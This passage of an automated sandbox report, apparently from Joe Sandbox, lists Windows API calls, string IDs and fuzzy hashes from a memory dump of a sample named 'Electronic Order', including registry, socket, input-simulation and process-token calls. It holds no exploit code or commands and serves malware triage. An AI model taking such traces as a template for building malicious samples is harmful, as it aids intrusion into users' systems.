                                      • Opcode Fuzzy Hash: 8a72f88718ffe3962e1a9ef71d5ffb38cd8093a09726285c179b8a1e88ad517e
                                      • Instruction Fuzzy Hash: 2A5139A05043E57DFB3287249C05B7A7FAA5F17308F0854C9F1D8668C2D395EE88E760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      • Opcode ID: 15ddd74b802ee4fe7fdcc25098123735c90a84b93941449c6eb3c64aa9d62f64
                                      • Instruction ID: a5abb4d583352b4bc32723fa249efaceaf91b93674959ca4aff7a95103bf7a22
                                      • Opcode Fuzzy Hash: 15ddd74b802ee4fe7fdcc25098123735c90a84b93941449c6eb3c64aa9d62f64
                                      • Instruction Fuzzy Hash: EA41AFAAC2026876CB11FBB5888B9DFB3ACDF04710F509866F518E3121E634E714C7B9
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E1DAC5
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E1DAFB
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E1DB0C
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E1DB8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: ,,$DllGetClassObject
                                      • API String ID: 753597075-2867008933
                                      • Opcode ID: 02446b430e9583f939536bf5259774f20fd413c73481fb24b240f6261d23ef74
                                      • Instruction ID: 290ff33dea09c85473f5a004c635c54e126aa2356f39d1bbe8555f6ebc368db0
                                      • Opcode Fuzzy Hash: 02446b430e9583f939536bf5259774f20fd413c73481fb24b240f6261d23ef74
                                      • Instruction Fuzzy Hash: 5D418FB1608208EFDB15CF55CC84EDABBA9EF44310F1591A9ED06AF206D7B1DD84CBA0
                                      APIs
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E238D3,?), ref: 00E248C7
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E238D3,?), ref: 00E248E0
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E238F3
                                      • _wcscmp.LIBCMT ref: 00E2390F
                                      • MoveFileW.KERNEL32(?,?), ref: 00E23927
                                      • _wcscat.LIBCMT ref: 00E2396F
                                      • SHFileOperationW.SHELL32(?), ref: 00E239DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      • Opcode ID: bfc3d8f9fd9e7273d9ac594d44256b7719fb73a557af9ba6f2db1b1b8944337f
                                      • Instruction ID: 52abe5b3d2cb241b2b99621089335615584f6f1eec511fd9479070e8922f140f
                                      • Opcode Fuzzy Hash: bfc3d8f9fd9e7273d9ac594d44256b7719fb73a557af9ba6f2db1b1b8944337f
                                      • Instruction Fuzzy Hash: 084183B15083949EC751EF64D441AEFB7ECEF89340F00192EF489E3151EA74D688CB62
                                      APIs
                                      • _memset.LIBCMT ref: 00E47519
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E475C0
                                      • IsMenu.USER32(?), ref: 00E475D8
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E47620
                                      • DrawMenuBar.USER32 ref: 00E47633
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
                                      • Opcode ID: 6c0760203d542ce5a226afe9c9d5b2176116396570fe880e8528ddb85b3291e3
                                      • Instruction ID: 61abbeb9c34dab9a3c4a94db876bd5bf1c43199cdb1cb74ce66cd916ab794578
                                      • Opcode Fuzzy Hash: 6c0760203d542ce5a226afe9c9d5b2176116396570fe880e8528ddb85b3291e3
                                      • Instruction Fuzzy Hash: AF416974A04608EFDB10DF55E884E9ABBF9FB04314F058069ED99AB250D730AD44CFE0
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E4125C
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E41286
                                      • FreeLibrary.KERNEL32(00000000), ref: 00E4133D
                                        • Part of subcall function 00E4122D: RegCloseKey.ADVAPI32(?), ref: 00E412A3
                                        • Part of subcall function 00E4122D: FreeLibrary.KERNEL32(?), ref: 00E412F5
                                        • Part of subcall function 00E4122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E41318
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E412E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 7b60beb70e7d591b2200118638b8f0ff19c29994a92c91e1df0fad669a15d7b7
                                      • Instruction ID: 4b406f84cef87f3e2f94fbcd43bf80b52102351ebfe02beb16c38fb1c6034515
                                      • Opcode Fuzzy Hash: 7b60beb70e7d591b2200118638b8f0ff19c29994a92c91e1df0fad669a15d7b7
                                      • Instruction Fuzzy Hash: 11314BB5901119BFDF149F91EC89EFEB7BCEF09304F0001A9E501F2151EA74AE899AA4
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E4655B
                                      • GetWindowLongW.USER32(015A4E28,000000F0), ref: 00E4658E
                                      • GetWindowLongW.USER32(015A4E28,000000F0), ref: 00E465C3
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E465F5
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E4661F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E46630
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E4664A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 107049982258426b811b462b66958391a478c964fe4ef7c608dbe45d4271df9a
                                      • Instruction ID: ab6e3e1f777897b23b6ada3ba0096e492a7f20b66e0d8ef62365e8dcf387c179
                                      • Opcode Fuzzy Hash: 107049982258426b811b462b66958391a478c964fe4ef7c608dbe45d4271df9a
                                      • Instruction Fuzzy Hash: AF313534604210AFDB20CF19EC84F553BE1FB4A718F1A11A8F509AB2B5CB75EC44DB82
                                      APIs
                                        • Part of subcall function 00E380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E364D9
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E364E8
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E36521
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00E3652A
                                      • WSAGetLastError.WSOCK32 ref: 00E36534
                                      • closesocket.WSOCK32(00000000), ref: 00E3655D
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E36576
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      • Opcode ID: 1428352cdca54f5c842c4c996182bfe17451cb9c157494e180ee37865b18b6ac
                                      • Instruction ID: df181c043a13bdbb716aad8b2888805c019abc7a2a68dde695eee841a8c84d67
                                      • Opcode Fuzzy Hash: 1428352cdca54f5c842c4c996182bfe17451cb9c157494e180ee37865b18b6ac
                                      • Instruction Fuzzy Hash: 8231A135600218BFDB109F24DC89FBE7BA8EB45714F018029F909BB291DB74AD09CB61
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E1E0FA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E1E120
                                      • SysAllocString.OLEAUT32(00000000), ref: 00E1E123
                                      • SysAllocString.OLEAUT32 ref: 00E1E144
                                      • SysFreeString.OLEAUT32 ref: 00E1E14D
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E1E167
                                      • SysAllocString.OLEAUT32(?), ref: 00E1E175
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 7683c5cd0fe793030b9404bfe714c41cf435522441b9dd411eb25ea0a7faeb95
                                      • Instruction ID: 860ee337807efc06942db9c118b1dc5689225588ee879a98ac04a0f3c9d9e22f
                                      • Opcode Fuzzy Hash: 7683c5cd0fe793030b9404bfe714c41cf435522441b9dd411eb25ea0a7faeb95
                                      • Instruction Fuzzy Hash: 16217136705108BF9B10AFA9DC88CEB77ECEB09760B508125FD15EB360DA70DC858B64
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: b234d6fba0a0e9a729ff24bce4d4bd07b5d053fcdaa63bfe06a8e6c8cb0e14f9
                                      • Instruction ID: ae58b42b71e3396f66eeaaad6c42c86d757d1fb9fd297a4a3152ad580213be1c
                                      • Opcode Fuzzy Hash: b234d6fba0a0e9a729ff24bce4d4bd07b5d053fcdaa63bfe06a8e6c8cb0e14f9
                                      • Instruction Fuzzy Hash: A92167B2208251A6D330F621DC12EF7B398EF51344F54543AF886A7141EB50ADC2E3F9
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E478A1
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E478AE
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E478B9
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E478C8
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E478D4
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: d04ae392f7e391113d2560df9b1de753a00b8b478400cc0e953c8b845f02e77d
                                      • Instruction ID: a027717172a8d1cf6bf80f625fef8f080c34b391657a6207f713e38add7043c1
                                      • Opcode Fuzzy Hash: d04ae392f7e391113d2560df9b1de753a00b8b478400cc0e953c8b845f02e77d
                                      • Instruction Fuzzy Hash: 64118EB2510229BFEF159E60CC85EE77F6DEF0C798F015115FA48A6090C7729C21DBA0
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00DE4292,?), ref: 00DE41E3
                                      • GetProcAddress.KERNEL32(00000000), ref: 00DE41EA
                                      • EncodePointer.KERNEL32(00000000), ref: 00DE41F6
                                      • DecodePointer.KERNEL32(00000001,00DE4292,?), ref: 00DE4213
                                      Strings
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: b2d3799b608db49b48e3cdd1484191a797e98a7263d514dce6db70c7dc76131b
                                      • Instruction ID: 2131053e9f5418b47d01569d5bbf08897ef6e18770a0bc105b61cd472abebf95
                                      • Opcode Fuzzy Hash: b2d3799b608db49b48e3cdd1484191a797e98a7263d514dce6db70c7dc76131b
                                      • Instruction Fuzzy Hash: 35E0EDB45913419FEB216F73EC0DB0436A4BB52B42F504424F555F50E0DBB5409E8B14
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DE41B8), ref: 00DE42B8
                                      • GetProcAddress.KERNEL32(00000000), ref: 00DE42BF
                                      • EncodePointer.KERNEL32(00000000), ref: 00DE42CA
                                      • DecodePointer.KERNEL32(00DE41B8), ref: 00DE42E5
                                      Strings
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: 7cf493eb058980f3c87ae31335956d2c21520b32f0a814a880b0227857b0d41c
                                      • Instruction ID: 2f26160e7c4bb1ca3149294b7877ebfd2330ba9c592abfe63ec6c36afb62cf44
                                      • Opcode Fuzzy Hash: 7cf493eb058980f3c87ae31335956d2c21520b32f0a814a880b0227857b0d41c
                                      • Instruction Fuzzy Hash: 0FE09ABC5427019FEA109F62EC0DB053AA4F715F46F145428F505F11E0DBB4454D8B18
                                      APIs
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                                      • Instruction ID: 7d08fb2dfea5dde60c205e130ca9c01118668a40b7139f1b625788f090fc448f
                                      • Opcode Fuzzy Hash: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
                                      • Instruction Fuzzy Hash: 39619A315002AAABCF15EF20D896FFE77A5EF44708F044659F8596B192DE34AD42CBB0
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40548
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E40588
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E405AB
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E405D4
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E40617
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40624
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: ecca7cdf794e622774c239b813ddc3c79f511a93e239956bb9002c663b8a6fff
                                      • Instruction ID: bb7e5c60a7961a1bffcc1fc9df6085143eb5fe885cf82121f9e62d9b12add117
                                      • Opcode Fuzzy Hash: ecca7cdf794e622774c239b813ddc3c79f511a93e239956bb9002c663b8a6fff
                                      • Instruction Fuzzy Hash: FC517A31208241AFCB10EF64D885E6FBBE8FF89714F04496DF545A72A1DB31E945CB62
                                      APIs
                                      • GetMenu.USER32(?), ref: 00E45A82
                                      • GetMenuItemCount.USER32(00000000), ref: 00E45AB9
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E45AE1
                                      • GetMenuItemID.USER32(?,?), ref: 00E45B50
                                      • GetSubMenu.USER32(?,?), ref: 00E45B5E
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E45BAF
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: 6b27a986cfa648b9e134df4dcc489b06daba797c97464fad7458f3eeb0e6ebfa
                                      • Instruction ID: dfe8c204554cb891763152803676c17b33de534599be61ced945714c1d10d5f1
                                      • Opcode Fuzzy Hash: 6b27a986cfa648b9e134df4dcc489b06daba797c97464fad7458f3eeb0e6ebfa
                                      • Instruction Fuzzy Hash: 0D518136A00615EFCF15EFA5D845AAEB7B4EF48710F104469E815BB352CB70AE41CBA0
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E1F3F7
                                      • VariantClear.OLEAUT32(00000013), ref: 00E1F469
                                      • VariantClear.OLEAUT32(00000000), ref: 00E1F4C4
                                      • _memmove.LIBCMT ref: 00E1F4EE
                                      • VariantClear.OLEAUT32(?), ref: 00E1F53B
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E1F569
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: 82d91dafc10058a50f6db8de0d13723c0cd73382537c7f6e785c8cb76491042e
                                      • Instruction ID: b9d853c913d5ff0236bdd9393874acc35a3ca02f8f23e0b49cdce93e95c959b6
                                      • Opcode Fuzzy Hash: 82d91dafc10058a50f6db8de0d13723c0cd73382537c7f6e785c8cb76491042e
                                      • Instruction Fuzzy Hash: 175168B5A00209EFCB14CF58D880AAAB7F9FF4C314B158169E959EB300D730E952CBA0
                                      APIs
                                      • _memset.LIBCMT ref: 00E22747
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22792
                                      • IsMenu.USER32(00000000), ref: 00E227B2
                                      • CreatePopupMenu.USER32 ref: 00E227E6
                                      • GetMenuItemCount.USER32(000000FF), ref: 00E22844
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E22875
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: c9dab6f6ca287e4ae9fa0d3c80fdd85e1b059c2a49ce6c6a261b058bba5d6e0f
                                      • Instruction ID: 80b8286bc6a91f3f945854d8005d2aa6f62c7750a64724b435a36031ebd75526
                                      • Opcode Fuzzy Hash: c9dab6f6ca287e4ae9fa0d3c80fdd85e1b059c2a49ce6c6a261b058bba5d6e0f
                                      • Instruction Fuzzy Hash: F6517070900269EFDF2CCF64E888AADBBF5AF45318F10525DE611BB291D7709944CB51
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DC179A
                                      • GetWindowRect.USER32(?,?), ref: 00DC17FE
                                      • ScreenToClient.USER32(?,?), ref: 00DC181B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DC182C
                                      • EndPaint.USER32(?,?), ref: 00DC1876
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: ccfbe252b2c6e928da7a77de7c878a4e5d3b869fec2b7db3d566cbf577b11803
                                      • Instruction ID: c520a0674eaa63007b143268865ab06f3f6a80c63037945d9628bb055f5b1e0f
                                      • Opcode Fuzzy Hash: ccfbe252b2c6e928da7a77de7c878a4e5d3b869fec2b7db3d566cbf577b11803
                                      • Instruction Fuzzy Hash: B541BC74104212AFD710DF25CC84FBA7BF8EB4A724F14466DFA989B2A2C7309809DB71
                                      APIs
                                      • ShowWindow.USER32(00E867B0,00000000,015A4E28,?,?,00E867B0,?,00E4B862,?,?), ref: 00E4B9CC
                                      • EnableWindow.USER32(00000000,00000000), ref: 00E4B9F0
                                      • ShowWindow.USER32(00E867B0,00000000,015A4E28,?,?,00E867B0,?,00E4B862,?,?), ref: 00E4BA50
                                      • ShowWindow.USER32(00000000,00000004,?,00E4B862,?,?), ref: 00E4BA62
                                      • EnableWindow.USER32(00000000,00000001), ref: 00E4BA86
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E4BAA9
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: f702949893fcbd3f31d6e0eaa19b1bdefabd4bf45aaf3a394918fb2ad53f0723
                                      • Instruction ID: dd4e791b8d74e836c627d6da01924b13f178b65a2cb1eece5d613fb2f051e1c7
                                      • Opcode Fuzzy Hash: f702949893fcbd3f31d6e0eaa19b1bdefabd4bf45aaf3a394918fb2ad53f0723
                                      • Instruction Fuzzy Hash: 3B416334600241AFDB21CF15E489B957BE0FF49718F1852B9FA58AF2A2C731E84ADB51
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00E35134,?,?,00000000,00000001), ref: 00E373BF
                                        • Part of subcall function 00E33C94: GetWindowRect.USER32(?,?), ref: 00E33CA7
                                      • GetDesktopWindow.USER32 ref: 00E373E9
                                      • GetWindowRect.USER32(00000000), ref: 00E373F0
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E37422
                                        • Part of subcall function 00E254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      • GetCursorPos.USER32(?), ref: 00E3744E
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E374AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: ef03fc8305efbf299c12f5787331694d6e6caacee957a6c7107e27db5b2e6957
                                      • Instruction ID: 933dff173b37555d156c6356a22b588cc491ce2d13fa1c2d12f28064c359ba95
                                      • Opcode Fuzzy Hash: ef03fc8305efbf299c12f5787331694d6e6caacee957a6c7107e27db5b2e6957
                                      • Instruction Fuzzy Hash: 1031F272508305AFD720DF14D849F9BBBE9FF89304F001919F899A7191CA30E909CB92
                                      APIs
                                        • Part of subcall function 00E185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E18608
                                        • Part of subcall function 00E185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E18612
                                        • Part of subcall function 00E185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E18621
                                        • Part of subcall function 00E185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E18628
                                        • Part of subcall function 00E185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1863E
                                      • GetLengthSid.ADVAPI32(?,00000000,00E18977), ref: 00E18DAC
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E18DB8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E18DBF
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E18DD8
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E18977), ref: 00E18DEC
                                      • HeapFree.KERNEL32(00000000), ref: 00E18DF3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: f9e722edce993ebef1a94d070f3f0d5df05a294622556e2870fa73dcc6ed884d
                                      • Instruction ID: bb2779d2f51b2cd795061fd820f3bad269913aa4fe6f65b586dafb70c671d448
                                      • Opcode Fuzzy Hash: f9e722edce993ebef1a94d070f3f0d5df05a294622556e2870fa73dcc6ed884d
                                      • Instruction Fuzzy Hash: 5011DC35901604FFDB108FA5ED49BEE7BADEF42319F104129E845B3251CB329985CB60
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E18B2A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E18B31
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E18B40
                                      • CloseHandle.KERNEL32(00000004), ref: 00E18B4B
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E18B7A
